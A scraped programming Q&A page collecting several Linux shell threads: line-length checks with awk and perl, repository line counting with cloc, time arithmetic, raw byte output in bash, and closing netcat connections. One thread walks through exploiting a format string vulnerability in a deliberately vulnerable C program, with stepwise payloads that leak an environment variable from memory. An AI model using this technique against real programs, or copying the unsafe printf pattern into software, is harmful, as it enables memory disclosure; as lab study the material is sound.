find length of a fixed width file wtih a little twist

find length of a fixed width file wtih a little twist - linux

Hi Wonderful People/My Gurus and all kind-hearted people.
I've a fixed width file and currently i'm trying to find the length of those rows that contain x bytes. I tried couple of awk commands but, it is not giving me the result that i wanted. My fixed width contains 208bytes, but there are few rows that don't contain 208 bytes. I"m trying to discover those records that doesn't have 208bytes.
this cmd gave me the file length
awk '{print length;exit}' file.text
here i tried to print rows that contain 101 bytes, but it didn't work.
awk '{print length==101}' file.text
Any help/insights here would be highly helpful

With awk:
awk 'length() < 208' file
Well, length() gives you the number of characters, not bytes. This number can differ in unicode context. You can use the LANG environment variable to force awk to use bytes:
LANG=C awk 'length() < 208' file

Perl to the rescue!
perl -lne 'print "$.:", length if length != 208' -- file.text
-n reads the input line by line
-l removes newlines from the input before processing it and adds them to print
The one-liner will print line number ($.) and the length of the line for each line whose length is different than 208.

if you're using gawk, then it's no issue, even in typical UTF-8 locale mode :
length(s) = # chars native to locale,
# typically that means # utf-8 chars
match(s, /$/) - 1 = # raw bytes # this also work for pure-binary
# inputs, without triggering
# any error messages in gawk Unicode mode
Best illustrated by example :
0000000 3347498554 3381184647 3182945161 171608122
: Ɔ ** Ǉ ** Ȉ ** ɉ ** 㷽 ** ** : 210 : \n
072 306 206 307 207 310 210 311 211 343 267 275 072 210 072 012
: ? 86 ? 87 ? 88 ? 89 ? ? ? : 88 : nl
58 198 134 199 135 200 136 201 137 227 183 189 58 136 58 10
3a c6 86 c7 87 c8 88 c9 89 e3 b7 bd 3a 88 3a 0a
0000020
# gawk profile, created Sat Oct 29 20:32:49 2022
BEGIN {
1 __ = "\306\206\307\207\310" (_="\210") \
"\311\211\343\267\275"
1 print "",__,_
1 STDERR = "/dev/stderr"
1 print ( match(_, /$/) - 1, "_" ) > STDERR # *A
1 print ( length(__), match(__, /$/) - 1 ) > STDERR # *B
1 print ( (__~_), match(__, (_) ".*") ) > STDERR # *C
1 print ( RSTART, RLENGTH ) > STDERR # *D
}
1 | _ *A # of bytes off "_" because it was defined as 0x88 \210
5 | 11 *B # of chars of "__", and
# of bytes of it :
# 4 x 2-byte UC
# + 1 x 3-byte UC = 11
1 | 3 *C # does byte \210 exist among larger string (true/1),
# and which unicode character is 1st to
# contain \210 - the 3rd one, by original definition
3 | 3 *D # notice I also added a ".*" to the tail of this match() :
# if the left-side string being tested is valid UTF-8,
# then this will match all the way to the end of string,
# inclusive, in which you can deduce :
#
# "\210 first appeared in 3rd-to-last utf-8 character"
Combining that inferred understanding :
RLENGTH = "3 chars to the end, inclusive",
with knowledge of how many to its left :
RSTART - 1 = "2 chars before",
yields a total count of 3 + 2 = 5, affirming length()'s result

Related

Line counting - How to exclude a directory and images?

In order to count the lines of my repository, I typed the code below, and found out that images and pdfs are also included in the word count.
git ls-files | xargs wc -l
When someone asks you for the scale of the repository, would you include the images/pdfs?
If not, could someone help me answer the questions below?
How to exclude the files under "/pdfs" directory
How to exclude .jpg and .png?

You can make use of cloc. It counts blank lines, comment lines, and physical lines of source code in many programming languages. Cloc can take file, directory, and/or archive names as inputs. For instance, if you want to count the number of lines of code in your repository and exclude some directories while counting, you can specify those directories separated by comma like this:
cloc --exclude-dir=imagedir,pdfdir your_repository
cloc will show you the report like this:
387 text files.
387 unique files.
22 files ignored.
github.com/AlDanial/cloc v 1.88 T=0.97 s (376.5 files/s, 152866.0 lines/s)
-------------------------------------------------------------------------------
Language files blank comment code
-------------------------------------------------------------------------------
Go 235 17216 11769 95308
InstallShield 2 410 0 11178
XML 41 1418 159 2738
Python 5 516 523 1792
Bourne Shell 21 266 283 1512
JSON 19 24 0 1005
Markdown 23 452 0 797
AsciiDoc 4 119 0 312
Ruby 4 44 31 238
YAML 4 4 2 113
WiX source 1 19 24 112
make 3 16 25 68
DOS Batch 2 13 2 38
WiX include 1 0 0 28
Dockerfile 1 13 9 17
-------------------------------------------------------------------------------
SUM: 366 20530 12827 115256
-------------------------------------------------------------------------------
You can also use CLOC with Git like this:
cloc $(git ls-files)
which is equivalent to
git ls-files | xargs cloc

cloc sounds like it does the job. You should remove space+tab from IFS if you use command sub though: IFS=$'\n' cloc $(git ls-files)
If you just want to know a word count or line count, you could bodge it together like this. It gives you the language too. Clone the repo, test for text file / file type, count lines, delete files.
#!/bin/sh -e
# Get dir name from URL + remove trailing slashes - works for _most_ urls
url=${1:? No URL given}
url=${url%/}; url=${url%/}
repo=${1##*/}
repo=${repo%.git}
dir=./$repo
# Clone repo in tmp
cd "${TMPDIR:-/tmp}"
[ -e "$dir" ] && { echo Exists: "$dir" >&2; exit 1; }
trap 'rm -rf "$dir"' EXIT INT
git clone "$url"
# Get column 1 width, for alignment
max_path_length=$(printf '%s\n' "$dir/"* | wc -L)
# Extract and print the data
printf '\n%s\n\n' "$repo text files details:"
for file in "$dir"/*; do
mime=$(file --brief --mime-type "$file")
type=${mime%%/*}
if [ "$type" = text ]; then
lines=$(grep -c . "$file") || true
lang=${mime##*/}
printf "%-${max_path_length}s %s\n" "${file#$dir}" "[$lang, $lines lines]"
total_lines=$((total_lines + lines))
fi
done
printf '\n%s\n\n' "${dir#./} total lines: $total_lines"
Example output:
$ git-wc 'git://git.savannah.gnu.org/sed.git'
Cloning into 'sed'...
remote: Counting objects: 6276, done.
remote: Compressing objects: 100% (1134/1134), done.
remote: Total 6276 (delta 4994), reused 6276 (delta 4994)
Receiving objects: 100% (6276/6276), 2.14 MiB | 495.00 KiB/s, done.
Resolving deltas: 100% (4994/4994), done.
sed text files details:
/AUTHORS [plain, 6 lines]
/BUGS [plain, 101 lines]
/COPYING [plain, 553 lines]
/ChangeLog-2014 [plain, 2586 lines]
/Makefile.am [x-makefile, 123 lines]
/NEWS [plain, 498 lines]
/README [plain, 12 lines]
/README-hacking [plain, 58 lines]
/THANKS.in [plain, 63 lines]
/basicdefs.h [x-c, 83 lines]
/bootstrap [x-shellscript, 930 lines]
/bootstrap.conf [plain, 121 lines]
/cfg.mk [plain, 343 lines]
/configure.ac [x-m4, 294 lines]
/init.cfg [plain, 163 lines]
/thanks-gen [x-perl, 12 lines]
sed total lines: 5946
If the repo is local, you can just adjust the input methods. I'm sure the idea is clear. I know cloning the whole repo may be the dumbest way to do something like this, but sometimes you just want to know a thing. Plus you can use bash/sh - eg. [[ "$file" == "$dir/<exclude-dir>/* ]].

Reading an environment variable using the format string vulnerability in a 64 bit OS

I'm trying to read a value from the environment by using the format string vulnerability.
This type of vulnerability is documented all over the web, however the examples that I've found only cover 32 bits Linux, and my desktop's running a 64 bit Linux.
This is the code I'm using to run my tests on:
//fmt.c
#include <stdio.h>
#include <string.h>
int main (int argc, char *argv[]) {
char string[1024];
if (argc < 2)
return 0;
strcpy( string, argv[1] );
printf( "vulnerable string: %s\n", string );
printf( string );
printf( "\n" );
}
After compiling that I put my test variable and get its address. Then I pass it to the program as a parameter and I add a bunch of format in order to read from them:
$ export FSTEST="Look at my horse, my horse is amazing."
$ echo $FSTEST
Look at my horse, my horse is amazing.
$ ./getenvaddr FSTEST ./fmt
FSTEST: 0x7fffffffefcb
$ printf '\xcb\xef\xff\xff\xff\x7f' | od -vAn -tx1c
cb ef ff ff ff 7f
313 357 377 377 377 177
$ ./fmt $(printf '\xcb\xef\xff\xff\xff\x7f')`python -c "print('%016lx.'*10)"`
vulnerable string: %016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.
00000000004052a0.0000000000000000.0000000000000000.00000000ffffffff.0000000000000060.
0000000000000001.00000060f7ffd988.00007fffffffd770.00007fffffffd770.30257fffffffefcb.
$ echo '\xcb\xef\xff\xff\xff\x7f%10$16lx'"\c" | od -vAn -tx1c
cb ef ff ff ff 7f 25 31 30 24 31 36 6c 78
313 357 377 377 377 177 % 1 0 $ 1 6 l x
$ ./fmt $(echo '\xcb\xef\xff\xff\xff\x7f%10$16lx'"\c")
vulnerable string: %10$16lx
31257fffffffefcb
The 10th value contains the address I want to read from, however it's not padded with 0s but with the value 3125 instead.
Is there a way to properly pad that value so I can read the environment variable with something like the '%s' format?

So, after experimenting for a while, I ran into a way to read an environment variable by using the format string vulnerability.
It's a bit sloppy, but hey - it works.
So, first the usual. I create an environment value and find its location:
$ export FSTEST="Look at my horse, my horse is amazing."
$ echo $FSTEST
Look at my horse, my horse is amazing.
$ /getenvaddr FSTEST ./fmt
FSTEST: 0x7fffffffefcb
Now, no matter how I tried, putting the address before the format strings always got both mixed, so I moved the address to the back and added some padding of my own, so I could identify it and add more padding if needed.
Also, python and my environment don't get along with some escape sequences, so I ended up using a mix of both the python one-liner and printf (with an extra '%' due to the way the second printf parses a single '%' - be sure to remove this extra '%' after you test it with od/hexdump/whathaveyou)
$ printf `python -c "print('%%016lx|' *1)"\
`$(printf '--------\xcb\xef\xff\xff\xff\x7f\x00') | od -vAn -tx1c
25 30 31 36 6c 78 7c 2d 2d 2d 2d 2d 2d 2d 2d cb
% 0 1 6 l x | - - - - - - - - 313
ef ff ff ff 7f
357 377 377 377 177
With that solved, next step would be to find either the padding or (if you're lucky) the address.
I'm repeating the format string 110 times, but your mileage might vary:
./fmt `python -c "print('%016lx|' *110)"\
`$(printf '--------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|%016lx|%016lx|...|--------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
0000000000000324|...|2d2d2d2d2d2d7c78|7fffffffefcb2d2d|0000038000000300|
00007fffffffd8d0|00007ffff7ffe6d0|--------
The consecutive '2d' values are just the hex values for '-'
After adding more '-' for padding and testing, I ended up with something like this:
./fmt `python -c "print('%016lx|' *110)"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|%016lx|...|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c78|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|00007fffffffefcb|------------------------------
So, the address got pushed towards the very last format placeholder.
Let's modify the way we output these format placeholders so we can manipulate the last one in a more convenient way:
$ ./fmt `python -c "print('%016lx|' *109 + '%016lx|')"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|...|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c78|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|00007fffffffefcb|------------------------------
It should show the same result, but now it's possible to use an '%s' as the last placeholder.
Replacing '%016lx|' with just '%s|' wont work, because the extra padding is needed. So, I just add 4 extra '|' characters to compensate:
./fmt `python -c "print('%016lx|' *109 + '||||%s|')"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|...|||||%s|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c73|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|||||Look at my horse, my horse is amazing.|
------------------------------
Voilà, the environment variable got leaked.

Convert a text into time format using bash script

I am new to shell scripting.. I have a tab-separated file, e.g.,
0018803 01 1710 2050 002571
0018951 01 1934 2525 003277
0019362 02 2404 2415 002829
0019392 01 2621 2820 001924
0019542 01 2208 2413 003434
0019583 01 1815 2134 002971
Here, the 3rd and 4th column is representing Start Time and End Time.
I want to convert these two columns in proper timeFrame so that I can get 6th column as the exact time difference between column 4 and column 3 in hours and minutes.
Column 6 result will be 3:40, 5:51, 00:11, 1:59, 2:05.

One way with awk:
$ cat test.awk
# create a function to split hour and minute
function f(h, x) {
h[0] = substr(x,1,2)+0
h[1] = substr(x,3,2)+0
}
{
f(start, $3);
f(end, $4);
span = end[1] - start[1] > 0 \
? sprintf("%d:%02d", end[0]-start[0], end[1]-start[1]) \
: sprintf("%d:%02d", end[0]-start[0]-1, 60+end[1]-start[1]);
print $0 OFS span
}
then run the awk file as the following:
$ awk -f test.awk input_file
Edit: per #glenn jackman's suggestion, the code can be simplified (refer to #Kamil Cuk's method):
function g(x) {
return substr(x,1,2)*60 + substr(x,3,2)
}
{
span = g($4) - g($3)
printf("%s%s%d:%02d\n", $0, OFS, int(span/60), span%60)
}

A simple bash solution using arithmetic expansion:
while IFS='' read -r l; do
IFS=' ' read -r _ _ st et _ <<<"$l"
d=$(( (10#${et:0:2} * 60 + 10#${et:2:2}) - (10#${st:0:2} * 60 + 10#${st:2:2}) ))
printf "%s %02d:%02d\n" "$l" "$((d/60))" "$((d%60))"
done < intput_file_path
will output:
0018803 01 1710 2050 002571 03:40
0018951 01 1934 2525 003277 05:51
0019362 02 2404 2415 002829 00:11
0019392 01 2621 2820 001924 01:59
0019542 01 2208 2413 003434 02:05
0019583 01 1815 2134 002971 03:19

Here is one in GNU awk using time functions, mktime to convert to epoch time and strftime to convert the time to desired format HH:MM:
$ awk -v OFS="\t" '{
dt3="1970 01 01 " substr($3,1,2) " " substr($3,3,2) " 00"
dt4="1970 01 01 " substr($4,1,2) " " substr($4,3,2) " 00"
print $0,strftime("%H:%M",mktime(dt4)-mktime(dt3),1) # thanks #glennjackman,1 :)
}' file
Output ($6 only):
03:40
05:51
00:11
01:59
02:05
03:19

Emitting a character (or multi-byte binary string) by integer ordinal in bash

I'm trying to echo integer in bash as is, without converting each digit to ASCII and outputting corresponding sequence. e.g.
echo "123" | hd
00000000 31 32 33 0a |123.|
it's outputting ASCII codes of each character. How can I output 123 itself, as unsigned integer for example? so that I get something like
00000000 0x7B 00 00 00

That's a job for printf
$ printf "\x$(printf '%x' "123")" | hd
00000000 7b |{|
The internal printf converts the decimal number 123 to hexadecimal and the external printf use \x to create a byte with that value.
If you want several bytes, use this:
$ printf '%b' "$(printf '\\x%x' "123" "96" "68")" | hd
00000000 7b 60 44 |{`D|
Or, if you want to use hexadecimal:
$ printf '%b' "$(printf '\\x%x' "0x7f" "0xFF" "0xFF")" | hd
00000000 7f ff ff |...|
Or, in this case, simply:
$ printf '\x7f\xFF\xFF' | hd
00000000 7f ff ff |...|

You have to be careful of endianess. x86 is little endian so you must store least significant byte first.
As an example, if you want to store the 32bit integer : 2'937'252'660d = AF'12'EB'34h on disk, you have to write : 0x34, then 0xEB, then 0x12 and then 0xAF, in that order.
Is use this helper for the same purpose as yours:
printf "%.4x\n" 2937252660 | fold -b2 | tac | while read a; do echo -e -n "\\x${a}"; done
printf change from dec base to hex base
fold splits by groups of 2 chars, i.e 1 byte
tac reverse the lines (this is where little-endian is applied)
while loop echo one raw byte at a time

Borrowing the observation from #Setop's answer that the examples imply that the OP wants uint32s, but trying to build a more efficient implementation (involving no subshells or external commands):
print_byte() {
local val
printf -v val '%02x' "$1"
printf '%b' "\x${val}"
}
print_uint32() {
print_byte "$(( ( $1 / (( 256 ** 0 )) ) % 256 ))"
print_byte "$(( ( $1 / (( 256 ** 1 )) ) % 256 ))"
print_byte "$(( ( $1 / (( 256 ** 2 )) ) % 256 ))"
print_byte "$(( ( $1 / (( 256 ** 3 )) ) % 256 ))"
}
Thus:
print_uint32 32 | xxd # this should be a single space, padded with nulls
...correctly yields:
00000000: 2000 0000 ...
...as demonstrated to reverse back to the original value by the Python struct.unpack() module:
$ print_uint32 32 |
> python -c 'import struct, sys; print struct.unpack("I", sys.stdin.read())'
32

How can I close a netcat connection after a certain character is returned in the response?

We have a very simple tcp messaging script that cats some text to a server port which returns and displays a response.
The part of the script we care about looks something like this:
cat someFile | netcat somehost 1234
The response the server returns is 'complete' once we get a certain character code (specifically &001C) returned.
How can I close the connection when I receive this special character?
(Note: The server won't close the connection for me. While I currently just CTRL+C the script when I can tell it's done, I wish to be able to send many of these messages, one after the other.)
(Note: netcat -w x isn't good enough because I wish to push these messages through as fast as possible)

Create a bash script called client.sh:
#!/bin/bash
cat someFile
while read FOO; do
echo $FOO >&3
if [[ $FOO =~ `printf ".*\x00\x1c.*"` ]]; then
break
fi
done
Then invoke netcat from your main script like so:
3>&1 nc -c ./client.sh somehost 1234
(You'll need bash version 3 for the regexp matching).
This assumes that the server is sending data in lines - if not you'll have to tweak client.sh so that it reads and echoes a character at a time.

How about this?
Client side:
awk -v RS=$'\x1c' 'NR==1;{exit 0;}' < /dev/tcp/host-ip/port
Testing:
# server side test script
while true; do ascii -hd; done | { netcat -l 12345; echo closed...;}
# Generate 'some' data for testing & pipe to netcat.
# After netcat connection closes, echo will print 'closed...'
# Client side:
awk -v RS=J 'NR==1; {exit;}' < /dev/tcp/localhost/12345
# Changed end character to 'J' for testing.
# Didn't wish to write a server side script to generate 0x1C.
Client side produces:
0 NUL 16 DLE 32 48 0 64 # 80 P 96 ` 112 p
1 SOH 17 DC1 33 ! 49 1 65 A 81 Q 97 a 113 q
2 STX 18 DC2 34 " 50 2 66 B 82 R 98 b 114 r
3 ETX 19 DC3 35 # 51 3 67 C 83 S 99 c 115 s
4 EOT 20 DC4 36 $ 52 4 68 D 84 T 100 d 116 t
5 ENQ 21 NAK 37 % 53 5 69 E 85 U 101 e 117 u
6 ACK 22 SYN 38 & 54 6 70 F 86 V 102 f 118 v
7 BEL 23 ETB 39 ' 55 7 71 G 87 W 103 g 119 w
8 BS 24 CAN 40 ( 56 8 72 H 88 X 104 h 120 x
9 HT 25 EM 41 ) 57 9 73 I 89 Y 105 i 121 y
10 LF 26 SUB 42 * 58 : 74
After 'J' appears, server side closes & prints 'closed...', ensuring that the connection has indeed closed.

Try:
(cat somefile; sleep $timeout) | nc somehost 1234 | sed -e '{s/\x01.*//;T skip;q;:skip}'
This requires GNU sed.
How it works:
{
s/\x01.*//; # search for \x01, if we find it, kill it and the rest of the line
T skip; # goto label skip if the last s/// failed
q; # quit, printing current pattern buffer
:skip # label skip
}
Note that this assumes there'll be a newline after \x01 - sed won't see it otherwise, as sed operates line-by-line.

Maybe have a look at Ncat as well:
"Ncat is the culmination of many key features from various Netcat incarnations such as Netcat 1.x, Netcat6, SOcat, Cryptcat, GNU Netcat, etc. Ncat has a host of new features such as "Connection Brokering", TCP/UDP Redirection, SOCKS4 client and server supprt, ability to "Chain" Ncat processes, HTTP CONNECT proxying (and proxy chaining), SSL connect/listen support, IP address/connection filtering, plus much more."
http://nmap-ncat.sourceforge.net

This worked best for me. Just read the output with a while loop and then check for "0x1c" using an if statement.
while read i; do
if [ "$i" = "0x1c" ] ; then # Read until "0x1c". Then exit
break
fi
echo $i;
done < <(cat someFile | netcat somehost 1234)

Develop Reference

node.js excel linux python-3.x azure haskell apache-spark rust .htaccess string

find length of a fixed width file wtih a little twist - linux

With awk: awk 'length() < 208' file Well, length() gives you the number of characters, not bytes. This number can differ in unicode context. You can use the LANG environment variable to force awk to use bytes: LANG=C awk 'length() < 208' file

Related

Line counting - How to exclude a directory and images?

Reading an environment variable using the format string vulnerability in a 64 bit OS

Convert a text into time format using bash script

Emitting a character (or multi-byte binary string) by integer ordinal in bash

How can I close a netcat connection after a certain character is returned in the response?

Categories

Resources